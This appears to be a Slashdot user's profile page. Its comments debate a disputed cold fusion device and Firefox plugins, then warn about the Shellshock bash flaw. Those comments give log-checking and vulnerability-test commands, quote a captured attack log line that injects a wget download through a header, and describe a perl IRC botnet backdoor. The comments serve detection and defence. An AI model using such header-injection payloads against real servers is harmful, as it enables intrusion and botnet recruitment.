Slashdot is powered by your submissions, so send in your scoop


Forgot your password?

Clarificiation on the IP Address Security in Dropbox Case 152

Posted by samzenpus
from the read-all-about-it dept.
Bennett Haselton writes A judge rules that a county has to turn over the IP addresses that were used to access a county mayor's Dropbox account, stating that there is no valid security-related reason why the IP addresses should be exempt from a public records request. I think the judge's conclusion about IP addresses was right, but the reasoning was flawed; here is a technically more correct argument that would have led to the same answer. Keep Reading to see what Bennett has to say about the case.

Comment: Re:plugin-container.exe (Score 1) 400

I guess it could - firefox's plugin-container is compiled for the same arch as the browser itself though (so if you install firefox 32 bits, you'll get the 32 bits plugin-container).

A quick search seems to suggest it would be theoretically possible to have an 64 bits firefox talking to a 32 bits plugin-container loading, say, the flash plugin; it appears however that that would require an IPC bridge between both process to perform some sort of conversion (this suggests that somehow the way both process communicate is arch dependent ? I don't know enough about xulrunner to confirm).
There's a compatibility layer that apparently exists to do exactly that: nspluginwrapper.

Myself, I tend to avoid the headache and simply run the 32 bits version of Firefox even on an amd64 system.

Comment: Re:Any suffiently advanced tech... (Score 3, Insightful) 986

But the "inventor" hooked up the meter, no?

No. The entire experiment was setup by the researchers themselves; the lab has no connection to Rossi, and none of the equipment came or was set-up by him. His only implication was to be here for the initial "fuel" insertion and the ash retrieval at the end, while being monitored (though that's more than enough to be suspicious of the alleged transmutation and suspect some sort of swap - still, it doesn't explain the excess energy).

Comment: Re:Hoax (Score 3, Interesting) 986

Oh, he says words which he calls an explanation, but they fly in the face of already-understood theory, and he offers no explanations about why already-understood theory is wrong.

Agreed on this - it should be noted, though, that Rossi is not the only one that claims excess energy and transmutation using these kinds of mechanisms; look up for example the MIT NANOR devide (a small scale device that put out excess energy for more than one month straight), or the Mitsubishi transmutation claims in similar devices (later replicated by Toshiba). There are also other companies claiming similar things (Brillouin for one).

If this thing works (and that's obviously a big if), then I'd suspect Rossi discovered this mostly by accident, and that he has no precise idea himself of how it actually produces energy. IIRC, the few initial theories proposed are based on the idea of nano-scale lattices with trapped hydrogen inside; combined with some sort of excitation (EM usually, although not the only one that apparently produced some results) allowing somehow for the Coulomb barrier to be overcome at those scales and for a limited-scale, radiation-less (how ?) fusion to occur.

This is of course all pretty impossible given our current understanding of physics so if it does work somehow, it's wonderful news, even if it cannot be harnessed for energy; because it might lead to new, exciting physics.

Comment: Re:Hoax (Score 4, Interesting) 986

I don't see that anybody checked the "reactor" coating materials for rare earth dopants.

Read the report (specifically page 8 and annex 2) - they actually analyzed the device's coating material. It was made of Al2O3 (and this was taken into account in the calorimetry), with no obvious other compounds.

While there are possible calorimetry issues here, it's hard to see an obvious one that would explain such a large measurement error; alumina IR transparency has been considered, as well as IR calibration issues (especially given the imperfect dummy test); both do not appear to be valid critics (see my comment here for details).

Given the extraordinary claims, extraordinary evidence is obviously required here; and this report definitely isn't that. Its experimental protocol and the results obtained are however more than enough to warrant further investigation; which may be hard given that this isn't like a "classical" experiment, that can be easily replicated - you basically need Rossi/Industrial Heat (the company that acquired Rossi's device and tech) to provide you with his black box and stay the hell away from the test (this is the first time he actually did that; and even here he couldn't help himself being present for the initial "fuel" insertion and the ash extraction at the end of the experiment - which render the isotopic changes inevitably suspicious).

Comment: Re:They didn't TEST anything... (Score 5, Informative) 986

They looked at the instruments set up by Rossi

Nope, that was true in the first test, not this one. None of the instruments came or were set up by Rossi. This test didn't occur in his lab, but in a neutral lab with controlled access. He was however present for the loading of the initial "fuel" and the extraction of the ash at the end of the test (which was stupid, and suspicious - especially given the witnessed isotopic changes in the ash).

Even assuming he did some swap on the ash itself, though, it does not explain the witnessed extra heat output (which even with extremely conservative estimates in the paper sets a CoP at ~3.6).
Now, their calorimetry is far from perfect - there were initial concerns about alumina (the device's main material) transparency to IR, for example; those have been put to rest given the fact that the IR camera used works above 7um wavelengths and at those ranges, transparency isn't an issue. Another concern (stressed by other people above) is the whole way the IR camera itself was calibrated and set-up - however, the IR cam was a new, never before used one, and they simply tested its calibration. Even if the measures are off due to the bad calorimetry, there is no obvious way it could translate into an error of that magnitude without some other obvious signs of it (like crazy differences between the hotter "segments" of the device and others, colder ones). And once again, they made all of their calculation using very conservative estimates and taking into account all margins of error.

As for the researchers themselves, they are far from disreputable (except maybe for Levi in this specific context); they are engaging their reputation by publishing this and one of them, Hanno Essen, is also the head of the Swedish Skeptics Society and has at least some experience in dealing with crackpots and suspicious "revolutionary" inventions.

This does warrant further research; beyond ad hominem attacks on Rossi, I haven't seen any strong critic of the experimental protocol that hasn't been quickly debunked (except for the transmutation thing; that could be explained by Rossi doing some sort of swap. It should be noted that he was watched at all time by several people though).

+ - New positive independent report for Andrea Rossi's purported cold fusion device

Submitted by Solozerk
Solozerk (1003785) writes "The so-called "energy catalyzer", a purported cold fusion reactor device alleged by its inventor Andrea Rossi to be a revolutionary new source of energy, was previously discussed on Slashdot. Now, a new report has been leaked that appears to independently verify those claims. The paper, "Observation of abundant heat production from a reactor device and of isotopic changes in the fuel", describes the evaluation of the device as positive, yielding a COP (Coefficient of Performance) of 3.6. Contrary to previous evaluations of the device, Andrea Rossi was apparently not involved in any way with this one; only providing the device itself."

Comment: Only the beginning (Score 5, Informative) 236

by Solozerk (#47999045) Attached to: First Shellshock Botnet Attacking Akamai, US DoD Networks
It's not the only botnet being constructed, see my comment here - already 653 exploited servers there right now.
This is quite bad - as long as a bash CGI script is found by probing, exploiting only require putting a bash command in a header such as "Cookie:" for it to be executed. And this is only through HTTP - there are also aready other proof of concepts exploiting this through other bash-using services (DHCP servers for example).
You can check if you've been scanned for exploitable CGIs using something like (adjust apache logs path accordingly):

grep cgi /var/log/apache2/access*|egrep "};|}\s*;"

And you can check if your bash is vulnerable using:

env x='() { :;}; echo vulnerable' bash -c 'echo Testing...'

If 'vulnerable' appears, it is.

Comment: Re:Can confirm... (Score 2) 318

by Solozerk (#47998755) Attached to: Flurry of Scans Hint That Bash Vulnerability Could Already Be In the Wild
Another one attempts to download and execute h t t p :// , a perl backdoor that'll connect to a control IRC server ( port 443), presumably so that a botnet can be constructed. It allows for port scanning and DDOSing remote targets based on IRC commands received.

And right now, there are already 560 invisible users connected there... and it grows at quite a pace. The flaw is definitely being exploited in the wild.

Comment: Can confirm... (Score 2) 318

by Solozerk (#47998611) Attached to: Flurry of Scans Hint That Bash Vulnerability Could Already Be In the Wild
Just saw this in the server logs on one of our servers: - - [25/Sep/2014:18:55:59 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 404 392 "-" "() { :; }; /usr/bin/wget"

An attempt at exploiting the vulnerability (trying to wget h t t p : // to confirm the system is vulnerable).

"You don't go out and kick a mad dog. If you have a mad dog with rabies, you take a gun and shoot him." -- Pat Robertson, TV Evangelist, about Muammar Kadhafy